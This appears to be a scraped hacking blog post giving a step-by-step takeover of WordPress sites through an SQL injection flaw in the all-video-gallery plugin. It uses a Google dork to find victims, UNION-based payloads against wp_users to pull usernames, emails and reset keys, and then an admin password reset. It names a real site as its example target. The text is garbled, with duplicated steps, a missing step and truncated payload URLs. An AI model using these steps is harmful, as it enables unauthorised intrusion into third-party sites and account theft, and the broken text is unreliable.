What is Wordpress??
inurl:all-video-gallery/config.php?vid=
Open New Tab image for better preview.......
2>Open any website.... In my case its juangrial.com.
Exploit Code for finding username & password:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--
You can also try this.......well Both will work the same.........
Exploit Code for finding username & email:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users-
-
4>We Got admin Email......Now Let!s reset it.....
For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php
"Then click on Lost Password"
5>Enter the Email we Got IN earlier steps...
6>Now come back and go to activation table....
* Exploit Code for activation Key:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--
7>yeah!!!we got what we need now lets change the admin password...
goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8> Now open http://site.com/wp-admin
and Login with new password..........xD
WordPress is a free and open source blogging tool and a content management syste (CMS) based on PHP and MySQL. It has many features including a plug-in architecture and a template system.
WordPress is currently the most popular blogging system in use on the
Web.It was first released on May 27, 2003, by founders Matt Mullenweg.
WordPress is currently the most popular blogging system in use on the
Web.It was first released on May 27, 2003, by founders Matt Mullenweg.
Now lets move on to a hacking website.I have used here all-video-gallery(WordPress plugin) Sqli Vulnerability..
1>First we will find a Target using a Google dork inurl:all-video-gallery/config.php?vid=
Open New Tab image for better preview.......
2>Open any website.... In my case its juangrial.com.
- Now lets do a sql injection....copy the exploit code then hit enter then see the Magic...
Exploit Code for finding username & password:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--
You can also try this.......well Both will work the same.........
Exploit Code for finding username & email:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users-
-
4>We Got admin Email......Now Let!s reset it.....
For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php
"Then click on Lost Password"
5>Enter the Email we Got IN earlier steps...
6>Now come back and go to activation table....
* Exploit Code for activation Key:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--
7>yeah!!!we got what we need now lets change the admin password...
goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8> Now open http://site.com/wp-admin
and Login with new password..........xD
Post a Comment